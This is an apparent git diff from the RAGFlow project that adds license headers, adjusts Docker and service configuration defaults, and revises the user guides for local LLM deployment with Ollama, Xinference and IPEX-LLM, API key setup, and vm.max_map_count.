# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

TBL = {"94":"EMBA",
       "6":"MBA",
       "95":"MPA",

@@ -1,3 +1,15 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

TBL = {"1":{"name":"IT/通信/电子","parent":"0"},
       "2":{"name":"互联网","parent":"0"},

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

TBL = {
    "2":{"name":"北京","parent":"1"},
    "3":{"name":"天津","parent":"1"},

@@ -1,4 +1,16 @@
# -*- coding: UTF-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import os, json,re,copy
import pandas as pd
current_file_path = os.path.dirname(os.path.abspath(__file__))

@@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import json
from deepdoc.parser.resume.entities import degrees, regions, industries

@@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import re, copy, time, datetime, demjson3, \
    traceback, signal
import numpy as np

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import pdfplumber

from .ocr import OCR

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import copy
import re
import numpy as np
@@ -1,12 +1,13 @@
# Version of Elastic products
STACK_VERSION=8.11.3

# Set the cluster name
CLUSTER_NAME=rag_flow

# Port to expose Elasticsearch HTTP API to the host
ES_PORT=1200

# Set the Elasticsearch password
ELASTIC_PASSWORD=infini_rag_flow

# Port to expose Kibana to the host
KIBANA_PORT=6601

@@ -25,11 +26,12 @@ MINIO_PORT=9000
MINIO_USER=rag_flow
MINIO_PASSWORD=infini_rag_flow

REDIS_PORT=6379
REDIS_PASSWORD=infini_rag_flow

SVR_HTTP_PORT=9380

RAGFLOW_VERSION=v0.7.0
RAGFLOW_VERSION=dev

TIMEZONE='Asia/Shanghai'
@@ -24,6 +24,7 @@ services:
    environment:
      - TZ=${TIMEZONE}
      - HF_ENDPOINT=https://hf-mirror.com
      - MACOS=${MACOS}
    networks:
      - ragflow
    restart: always

@@ -24,6 +24,7 @@ services:
    environment:
      - TZ=${TIMEZONE}
      - HF_ENDPOINT=https://hf-mirror.com
      - MACOS=${MACOS}
    networks:
      - ragflow
    restart: always

@@ -8,12 +8,12 @@ services:
      - ${ES_PORT}:9200
    environment:
      - node.name=es01
      - cluster.name=${CLUSTER_NAME}
      - cluster.initial_master_nodes=es01
      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD}
      - bootstrap.memory_lock=false
      - xpack.security.enabled=false
      - cluster.max_shards_per_node=4096
      - discovery.type=single-node
      - xpack.security.enabled=true
      - xpack.security.http.ssl.enabled=false
      - xpack.security.transport.ssl.enabled=false
      - TZ=${TIMEZONE}
    mem_limit: ${MEM_LIMIT}
    ulimits:
@@ -77,6 +77,8 @@ services:
    image: redis:7.2.4
    container_name: ragflow-redis
    command: redis-server --requirepass ${REDIS_PASSWORD} --maxmemory 128mb --maxmemory-policy allkeys-lru
    ports:
      - ${REDIS_PORT}:6379
    volumes:
      - redis_data:/data
    networks:

@@ -24,6 +24,7 @@ services:
    environment:
      - TZ=${TIMEZONE}
      - HF_ENDPOINT=https://huggingface.co
      - MACOS=${MACOS}
    networks:
      - ragflow
    restart: always

@@ -15,6 +15,8 @@ minio:
  host: 'minio:9000'
es:
  hosts: 'http://es01:9200'
  username: 'elastic'
  password: 'infini_rag_flow'
redis:
  db: 1
  password: 'infini_rag_flow'
@@ -5,7 +5,7 @@ slug: /configure_knowledge_base

# Configure a knowledge base

Knowledge base, hallucination-free chat, and file management are three pillars of RAGFlow. RAGFlow's AI chats are based on knowledge bases. Each of RAGFlow's knowledge bases serves as a knowledge source, *parsing* files uploaded from your local machine and file references generated in **File Management** into the real 'knowledge' for future AI chats. This guide demonstrates some basic usages of the knowledge base feature, covering the following topics:
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's AI chats are based on knowledge bases. Each of RAGFlow's knowledge bases serves as a knowledge source, *parsing* files uploaded from your local machine and file references generated in **File Management** into the real 'knowledge' for future AI chats. This guide demonstrates some basic usages of the knowledge base feature, covering the following topics:

- Create a knowledge base
- Configure a knowledge base
@@ -124,7 +124,7 @@ RAGFlow uses multiple recall of both full-text search and vector search in its c

## Search for knowledge base

As of RAGFlow v0.7.0, the search feature is still in a rudimentary form, supporting only knowledge base search by name.
As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only knowledge base search by name.
@@ -5,71 +5,279 @@ slug: /deploy_local_llm

# Deploy a local LLM

RAGFlow supports deploying LLMs locally using Ollama or Xinference.
RAGFlow supports deploying models locally using Ollama or Xinference. If you have locally deployed models to leverage or wish to enable GPU or CUDA for inference acceleration, you can bind Ollama or Xinference into RAGFlow and use either of them as a local "server" for interacting with your local models.

## Ollama
RAGFlow seamlessly integrates with Ollama and Xinference, without the need for further environment configurations. You can use them to deploy two types of local models in RAGFlow: chat models and embedding models.

One-click deployment of local LLMs, that is [Ollama](https://github.com/ollama/ollama).
:::tip NOTE
This user guide does not intend to cover much of the installation or configuration details of Ollama or Xinference; its focus is on configurations inside RAGFlow. For the most current information, you may need to check out the official site of Ollama or Xinference.
:::

### Install
## Deploy a local model using Ollama

- [Ollama on Linux](https://github.com/ollama/ollama/blob/main/docs/linux.md)
- [Ollama Windows Preview](https://github.com/ollama/ollama/blob/main/docs/windows.md)
- [Docker](https://hub.docker.com/r/ollama/ollama)
[Ollama](https://github.com/ollama/ollama) enables you to run open-source large language models that you deployed locally. It bundles model weights, configurations, and data into a single package, defined by a Modelfile, and optimizes setup and configurations, including GPU usage.

### Launch Ollama
:::note
- For information about downloading Ollama, see [here](https://github.com/ollama/ollama?tab=readme-ov-file#ollama).
- For information about configuring Ollama server, see [here](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server).
- For a complete list of supported models and variants, see the [Ollama model library](https://ollama.com/library).
:::

Decide which LLM you want to deploy ([here's a list for supported LLM](https://ollama.com/library)), say, **mistral**:
To deploy a local model, e.g., **Llama3**, using Ollama:

### 1. Check firewall settings

Ensure that your host machine's firewall allows inbound connections on port 11434. For example:

```bash
$ ollama run mistral
sudo ufw allow 11434/tcp
```
Or,
### 2. Ensure Ollama is accessible

Restart your system and use curl or your web browser to check if the service URL of your Ollama service at `http://localhost:11434` is accessible.

```bash
$ docker exec -it ollama ollama run mistral
Ollama is running
```
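If you prefer scripting the check, here is a small Python sketch, assuming the default Ollama port; the root endpoint returns the plain-text banner shown above:

```python
import requests

r = requests.get("http://localhost:11434", timeout=5)
print(r.status_code, r.text)  # expect: 200 Ollama is running
```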
### Use Ollama in RAGFlow
### 3. Run your local model

- Go to 'Settings > Model Providers > Models to be added > Ollama'.

```bash
ollama run llama3
```
<details>
<summary>If your Ollama is installed through Docker, run the following instead:</summary>

> Base URL: Enter the base URL where the Ollama service is accessible, like, `http://<your-ollama-endpoint-domain>:11434`.
```bash
docker exec -it ollama ollama run llama3
```
</details>

- Use Ollama Models.
### 4. Add Ollama

In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Ollama to RAGFlow:

## Xinference

Xorbits Inference ([Xinference](https://github.com/xorbitsai/inference)) empowers you to unleash the full potential of cutting-edge AI models.

### Install
### 5. Complete basic Ollama settings

- [pip install "xinference[all]"](https://inference.readthedocs.io/en/latest/getting_started/installation.html)
- [Docker](https://inference.readthedocs.io/en/latest/getting_started/using_docker_image.html)
In the popup window, complete basic settings for Ollama:

1. Because **llama3** is a chat model, choose **chat** as the model type.
2. Ensure that the model name you enter here *precisely* matches the name of the local model you are running with Ollama.
3. Ensure that the base URL you enter is accessible to RAGFlow.
4. OPTIONAL: Switch on the toggle under **Does it support Vision?** if your model includes an image-to-text model.

:::caution NOTE
- If your Ollama and RAGFlow run on the same machine, use `http://localhost:11434` as base URL.
- If your Ollama and RAGFlow run on the same machine and Ollama is in Docker, use `http://host.docker.internal:11434` as base URL.
- If your Ollama runs on a different machine from RAGFlow, use `http://<IP_OF_OLLAMA_MACHINE>:11434` as base URL.
:::

:::danger WARNING
If your Ollama runs on a different machine, you may also need to set the `OLLAMA_HOST` environment variable to `0.0.0.0` in **ollama.service** (note that this is *NOT* the base URL):

```bash
Environment="OLLAMA_HOST=0.0.0.0"
```

See [this guide](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server) for more information.
:::

:::caution WARNING
Improper base URL settings will trigger the following error:
```bash
Max retries exceeded with url: /api/chat (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0xffff98b81ff0>: Failed to establish a new connection: [Errno 111] Connection refused'))
```
:::

### 6. Update System Model Settings

Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model:

*You should now be able to find **llama3** from the dropdown list under **Chat model**.*

> If your local model is an embedding model, you should find your local model under **Embedding model**.

### 7. Update Chat Configuration

Update your chat model accordingly in **Chat Configuration**:

> If your local model is an embedding model, update it on the configuration page of your knowledge base.

## Deploy a local model using Xinference

Xorbits Inference ([Xinference](https://github.com/xorbitsai/inference)) enables you to unleash the full potential of cutting-edge AI models.

:::note
- For information about installing Xinference, see [here](https://inference.readthedocs.io/en/latest/getting_started/).
- For a complete list of supported models, see the [Builtin Models](https://inference.readthedocs.io/en/latest/models/builtin/).
:::

To deploy a local model, e.g., **Mistral**, using Xinference:

### 1. Check firewall settings

Ensure that your host machine's firewall allows inbound connections on port 9997.

### 2. Start an Xinference instance

To start a local instance of Xinference, run the following command:
```bash
$ xinference-local --host 0.0.0.0 --port 9997
```
### Launch Xinference

Decide which LLM you want to deploy ([here's a list for supported LLM](https://inference.readthedocs.io/en/latest/models/builtin/)), say, **mistral**.
Execute the following command to launch the model, remember to replace `${quantization}` with your chosen quantization method from the options listed above:
### 3. Launch your local model

Launch your local model (**Mistral**), ensuring that you replace `${quantization}` with your chosen quantization method:
```bash
$ xinference launch -u mistral --model-name mistral-v0.1 --size-in-billions 7 --model-format pytorch --quantization ${quantization}
```
### 4. Add Xinference

### Use Xinference in RAGFlow
In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Xinference to RAGFlow:

- Go to 'Settings > Model Providers > Models to be added > Xinference'.

> Base URL: Enter the base URL where the Xinference service is accessible, like, `http://<your-xinference-endpoint-domain>:9997/v1`.
### 5. Complete basic Xinference settings

- Use Xinference Models.
Enter an accessible base URL, such as `http://<your-xinference-endpoint-domain>:9997/v1`.

### 6. Update System Model Settings

Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model.

*You should now be able to find **mistral** from the dropdown list under **Chat model**.*

> If your local model is an embedding model, you should find your local model under **Embedding model**.

### 7. Update Chat Configuration

Update your chat model accordingly in **Chat Configuration**:

> If your local model is an embedding model, update it on the configuration page of your knowledge base.

## Deploy a local model using IPEX-LLM

IPEX-LLM ([IPEX-LLM](https://github.com/intel-analytics/ipex-llm)) is a PyTorch library for running LLMs on Intel CPU and GPU (e.g., a local PC with iGPU, or a discrete GPU such as Arc, Flex, or Max) with very low latency.

To deploy a local model, e.g., **Qwen2**, using IPEX-LLM, follow the steps below:

### 1. Check firewall settings

Ensure that your host machine's firewall allows inbound connections on port 11434. For example:

```bash
sudo ufw allow 11434/tcp
```

### 2. Install and Start Ollama serve using IPEX-LLM

#### 2.1 Install IPEX-LLM for Ollama

IPEX-LLM's support for `ollama` is now available for Linux and Windows systems.

Visit [Run llama.cpp with IPEX-LLM on Intel GPU Guide](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md), and follow the instructions in section [Prerequisites](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#0-prerequisites) to set up, and section [Install IPEX-LLM cpp](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#1-install-ipex-llm-for-llamacpp) to install the IPEX-LLM with Ollama binaries.

**After the installation, you should have created a conda environment, named `llm-cpp` for instance, for running `ollama` commands with IPEX-LLM.**

#### 2.2 Initialize Ollama

Activate the `llm-cpp` conda environment and initialize Ollama by executing the commands below. A symbolic link to `ollama` will appear in your current directory.

- For **Linux users**:

  ```bash
  conda activate llm-cpp
  init-ollama
  ```

- For **Windows users**:

  Please run the following command with **administrator privilege in Miniforge Prompt**.

  ```cmd
  conda activate llm-cpp
  init-ollama.bat
  ```

> [!NOTE]
> If you have installed a higher version of `ipex-llm[cpp]` and want to upgrade your ollama binary file, don't forget to remove old binary files first and initialize again with `init-ollama` or `init-ollama.bat`.

**Now you can use this executable file following standard Ollama usage.**

#### 2.3 Run Ollama Serve

You may launch the Ollama service as below:

- For **Linux users**:

  ```bash
  export OLLAMA_NUM_GPU=999
  export no_proxy=localhost,127.0.0.1
  export ZES_ENABLE_SYSMAN=1
  source /opt/intel/oneapi/setvars.sh
  export SYCL_CACHE_PERSISTENT=1

  ./ollama serve
  ```

- For **Windows users**:

  Please run the following command in Miniforge Prompt.

  ```cmd
  set OLLAMA_NUM_GPU=999
  set no_proxy=localhost,127.0.0.1
  set ZES_ENABLE_SYSMAN=1
  set SYCL_CACHE_PERSISTENT=1

  ollama serve
  ```

> Please set environment variable `OLLAMA_NUM_GPU` to `999` to make sure all layers of your model are running on Intel GPU; otherwise, some layers may run on CPU.

> If your local LLM is running on Intel Arc™ A-Series Graphics with Linux OS (Kernel 6.2), it is recommended to additionally set the following environment variable for optimal performance before executing `ollama serve`:
>
> ```bash
> export SYCL_PI_LEVEL_ZERO_USE_IMMEDIATE_COMMANDLISTS=1
> ```

> To allow the service to accept connections from all IP addresses, use `OLLAMA_HOST=0.0.0.0 ./ollama serve` instead of just `./ollama serve`.

The console will display messages similar to the following:

### 3. Pull and Run Ollama Model

Keep the Ollama service on, open another terminal, and run `./ollama pull <model_name>` in Linux (`ollama.exe pull <model_name>` in Windows) to automatically pull a model, e.g., `qwen2:latest`:

#### Run Ollama Model

- For **Linux users**:
  ```bash
  ./ollama run qwen2:latest
  ```

- For **Windows users**:
  ```cmd
  ollama run qwen2:latest
  ```
### 4. Configure RAGFlow to use IPEX-LLM accelerated Ollama

The configuration follows the steps in the Ollama sections above: Section 4 [Add Ollama](#4-add-ollama), Section 5 [Complete basic Ollama settings](#5-complete-basic-ollama-settings), Section 6 [Update System Model Settings](#6-update-system-model-settings), and Section 7 [Update Chat Configuration](#7-update-chat-configuration).
@@ -3,28 +3,61 @@ sidebar_position: 4
slug: /llm_api_key_setup
---

# Set your LLM API key
# Configure your API key

You have two ways to input your LLM API key.
An API key is required for RAGFlow to interact with an online AI model. This guide provides information about setting your API key in RAGFlow.

## Before Starting The System
## Get your API key

In **user_default_llm** of [service_conf.yaml](https://github.com/infiniflow/ragflow/blob/main/docker/service_conf.yaml), you need to specify LLM factory and your own _API_KEY_.
RAGFlow supports the flowing LLMs, with more coming in the pipeline:
For now, RAGFlow supports the following online LLMs. Click the corresponding link to apply for your API key. Most LLM providers grant newly-created accounts trial credit, which will expire in a couple of months, or a promotional amount of free quota.

- [OpenAI](https://platform.openai.com/login?launch)
- [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
- [ZHIPU-AI](https://open.bigmodel.cn/),
- [Moonshot](https://platform.moonshot.cn/docs)
- [DeepSeek](https://platform.deepseek.com/api-docs/)
- [Baichuan](https://www.baichuan-ai.com/home)
- [VolcEngine](https://www.volcengine.com/docs/82379)
- [OpenAI](https://platform.openai.com/login?launch),
- [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
- [ZHIPU-AI](https://open.bigmodel.cn/),
- [Moonshot](https://platform.moonshot.cn/docs),
- [DeepSeek](https://platform.deepseek.com/api-docs/),
- [Baichuan](https://www.baichuan-ai.com/home),
- [VolcEngine](https://www.volcengine.com/docs/82379).

After sign in these LLM suppliers, create your own API-Key, they all have a certain amount of free quota.
:::note
If you find your online LLM is not on the list, don't feel disheartened. The list is expanding, and you can [file a feature request](https://github.com/infiniflow/ragflow/issues/new?assignees=&labels=feature+request&projects=&template=feature_request.yml&title=%5BFeature+Request%5D%3A+) with us! Alternatively, if you have customized or locally-deployed models, you can [bind them to RAGFlow using Ollama or Xinference](./deploy_local_llm.md).
:::

## After Starting The System
## Configure your API key

You can also set API-Key in **User Setting** as following:
You have two options for configuring your API key:

- Configure it in **service_conf.yaml** before starting RAGFlow.
- Configure it on the **Model Providers** page after logging into RAGFlow.

### Configure API key before starting up RAGFlow

1. Navigate to **./docker/ragflow**.
2. Find entry **user_default_llm** (a sketch follows below):
   - Update `factory` with your chosen LLM.
   - Update `api_key` with yours.
   - Update `base_url` if you use a proxy to connect to the remote service.
3. Reboot your system for your changes to take effect.
4. Log into RAGFlow.

*After logging into RAGFlow, you will find your chosen model appears under **Added models** on the **Model Providers** page.*
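A hedged sketch of what that **user_default_llm** entry might look like in **service_conf.yaml**; the factory and key values are illustrative, so substitute your own:

```yaml
user_default_llm:
  factory: 'Tongyi-Qianwen'   # your chosen LLM provider
  api_key: 'your-api-key'     # the key you applied for above
  base_url: ''                # set only if you connect through a proxy
```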
### Configure API key after logging into RAGFlow

:::caution WARNING
After logging into RAGFlow, configuring API key through the **service_conf.yaml** file will no longer take effect.
:::

After logging into RAGFlow, you can *only* configure API Key on the **Model Providers** page:

1. Click on your logo on the top right of the page **>** **Model Providers**.
2. Find your model card under **Models to be added** and click **Add the model**:
3. Paste your API key.
4. Fill in your base URL if you use a proxy to connect to the remote service.
5. Click **OK** to confirm your changes.

:::note
If you wish to update an existing API key at a later point:
:::
@@ -5,7 +5,7 @@ slug: /manage_files

# Manage files

Knowledge base, hallucination-free chat, and file management are three pillars of RAGFlow. RAGFlow's file management allows you to upload files individually or in bulk. You can then link an uploaded file to multiple target knowledge bases. This guide showcases some basic usages of the file management feature.
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's file management allows you to upload files individually or in bulk. You can then link an uploaded file to multiple target knowledge bases. This guide showcases some basic usages of the file management feature.

## Create folder

@@ -45,11 +45,11 @@ You can link your file to one knowledge base or multiple knowledge bases at one

## Move file to specified folder

As of RAGFlow v0.7.0, this feature is *not* available.
As of RAGFlow v0.8.0, this feature is *not* available.

## Search files or folders

As of RAGFlow v0.7.0, the search feature is still in a rudimentary form, supporting only file and folder search in the current directory by name (files or folders in the child directory will not be retrieved).
As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only file and folder search in the current directory by name (files or folders in the child directory will not be retrieved).

@@ -81,4 +81,4 @@ RAGFlow's file management allows you to download an uploaded file:

> As of RAGFlow v0.7.0, bulk download is not supported, nor can you download an entire folder.
> As of RAGFlow v0.8.0, bulk download is not supported, nor can you download an entire folder.
@@ -1,71 +0,0 @@
---
sidebar_position: 7
slug: /max_map_count
---

# Update vm.max_map_count

## Linux

To check the value of `vm.max_map_count`:

```bash
$ sysctl vm.max_map_count
```

Reset `vm.max_map_count` to a value at least 262144 if it is not.

```bash
# In this case, we set it to 262144:
$ sudo sysctl -w vm.max_map_count=262144
```

This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:

```bash
vm.max_map_count=262144
```

## Mac

```bash
$ screen ~/Library/Containers/com.docker.docker/Data/vms/0/tty
$ sysctl -w vm.max_map_count=262144
```
To exit the screen session, type Ctrl a d.

## Windows and macOS with Docker Desktop

The vm.max_map_count setting must be set via docker-machine:

```bash
$ docker-machine ssh
$ sudo sysctl -w vm.max_map_count=262144
```

## Windows with Docker Desktop WSL 2 backend

To manually set it every time you reboot, you must run the following commands in a command prompt or PowerShell window every time you restart Docker:

```bash
$ wsl -d docker-desktop -u root
$ sysctl -w vm.max_map_count=262144
```
If you are on these versions of WSL and you do not want to have to run those commands every time you restart Docker, you can globally change every WSL distribution with this setting by modifying your %USERPROFILE%\.wslconfig as follows:

```bash
[wsl2]
kernelCommandLine = "sysctl.vm.max_map_count=262144"
```
This will cause all WSL2 VMs to have that setting assigned when they start.

If you are on Windows 11, or Windows 10 version 22H2 and have installed the Microsoft Store version of WSL, you can modify the /etc/sysctl.conf within the "docker-desktop" WSL distribution, perhaps with commands like this:

```bash
$ wsl -d docker-desktop -u root
$ vi /etc/sysctl.conf
```
and appending a line which reads:
```bash
vm.max_map_count = 262144
```
@@ -5,7 +5,7 @@ slug: /start_chat

# Start an AI chat

Knowledge base, hallucination-free chat, and file management are three pillars of RAGFlow. Chats in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. Chats in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.

## Start an AI chat
@ -4,6 +4,8 @@ slug: /
|
||||
---
|
||||
|
||||
# Quick start
|
||||
import Tabs from '@theme/Tabs';
|
||||
import TabItem from '@theme/TabItem';
|
||||
|
||||
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. When integrated with LLMs, it is capable of providing truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
||||
|
||||
@ -16,38 +18,111 @@ This quick start guide describes a general process from:
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
- CPU ≥ 4 cores;
|
||||
- RAM ≥ 16 GB;
|
||||
- Disk ≥ 50 GB;
|
||||
- Docker ≥ 24.0.0 & Docker Compose ≥ v2.26.1.
|
||||
|
||||
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
||||
|
||||
## Start up the server
|
||||
|
||||
This section provides instructions on setting up the RAGFlow server on Linux. If you are on a different operating system, no worries. Most steps are alike.
|
||||
This section provides instructions on setting up the RAGFlow server on Linux. If you are on a different operating system, no worries. Most steps are alike.
|
||||
|
||||
1. Ensure `vm.max_map_count` >= 262144:
|
||||
<details>
|
||||
<summary>1. Ensure <code>vm.max_map_count</code> ≥ 262144:</summary>
|
||||
|
||||
> To check the value of `vm.max_map_count`:
|
||||
>
|
||||
> ```bash
|
||||
> $ sysctl vm.max_map_count
|
||||
> ```
|
||||
>
|
||||
> Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
>
|
||||
> ```bash
|
||||
> # In this case, we set it to 262144:
|
||||
> $ sudo sysctl -w vm.max_map_count=262144
|
||||
> ```
|
||||
>
|
||||
> This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
>
|
||||
> ```bash
|
||||
> vm.max_map_count=262144
|
||||
> ```
|
||||
> See [this guide](./guides/max_map_count.md) for instructions on permanently setting `vm.max_map_count` on an operating system other than Linux.
|
||||
`vm.max_map_count`. This value sets the maximum number of memory map areas a process may have. Its default value is 65530. While most applications require fewer than a thousand maps, reducing this value can result in abmornal behaviors, and the system will throw out-of-memory errors when a process reaches the limitation.
|
||||
|
||||
RAGFlow v0.8.0 uses Elasticsearch for multiple recall. Setting the value of `vm.max_map_count` correctly is crucial to the proper functioning of the Elasticsearch component.
|
||||
|
||||
<Tabs
|
||||
defaultValue="linux"
|
||||
values={[
|
||||
{label: 'Linux', value: 'linux'},
|
||||
{label: 'macOS', value: 'macos'},
|
||||
{label: 'Windows', value: 'windows'},
|
||||
]}>
|
||||
<TabItem value="linux">
|
||||
1.1. Check the value of `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ sysctl vm.max_map_count
|
||||
```
|
||||
|
||||
1.2. Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
|
||||
```bash
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
|
||||
1.3. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
|
||||
```bash
|
||||
vm.max_map_count=262144
|
||||
```
|
||||
</TabItem>
|
||||
<TabItem value="macos">
|
||||
If you are on macOS with Docker Desktop, then you *must* use docker-machine to update `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
</TabItem>
|
||||
<TabItem value="windows">
|
||||
|
||||
#### If you are on Windows with Docker Desktop, then you *must* use docker-machine to set `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
#### If you are on Windows with Docker Desktop WSL 2 backend, then use docker-desktop to set `vm.max_map_count`:
|
||||
|
||||
1.1. Run the following in WSL:
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after you restart Docker. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
|
||||
1.2. If you do not wish to have to run those commands each time you restart Docker, you can update your `%USERPROFILE%.wslconfig` as follows to keep your change permanent and globally for all WSL distributions:
|
||||
|
||||
```bash
|
||||
[wsl2]
|
||||
kernelCommandLine = "sysctl.vm.max_map_count=262144"
|
||||
```
|
||||
*This causes all WSL2 virtual machines to have that setting assigned when they start.*
|
||||
|
||||
:::note
|
||||
If you are on Windows 11 or Windows 10 version 22H2, and have installed the Microsoft Store version of WSL, you can also update the **/etc/sysctl.conf** within the docker-desktop WSL distribution to keep your change permanent:
|
||||
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ vi /etc/sysctl.conf
|
||||
```
|
||||
|
||||
```bash
|
||||
# Append a line, which reads:
|
||||
vm.max_map_count = 262144
|
||||
```
|
||||
:::
|
||||
</TabItem>
|
||||
</Tabs>
|
||||
|
||||
</details>
|
||||
|
||||
2. Clone the repo:

@ -57,7 +132,7 @@ This section provides instructions on setting up the RAGFlow server on Linux. If

3. Build the pre-built Docker images and start up the server:

> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
```bash
$ cd ragflow/docker
@ -93,7 +168,9 @@ This section provides instructions on setting up the RAGFlow server on Linux. If

5. In your web browser, enter the IP address of your server and log in to RAGFlow.

:::caution WARNING
With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
:::

## Configure LLMs

@ -113,7 +190,7 @@ To add and configure an LLM:
1. Click on your logo on the top right of the page **>** **Model Providers**:

![](image)

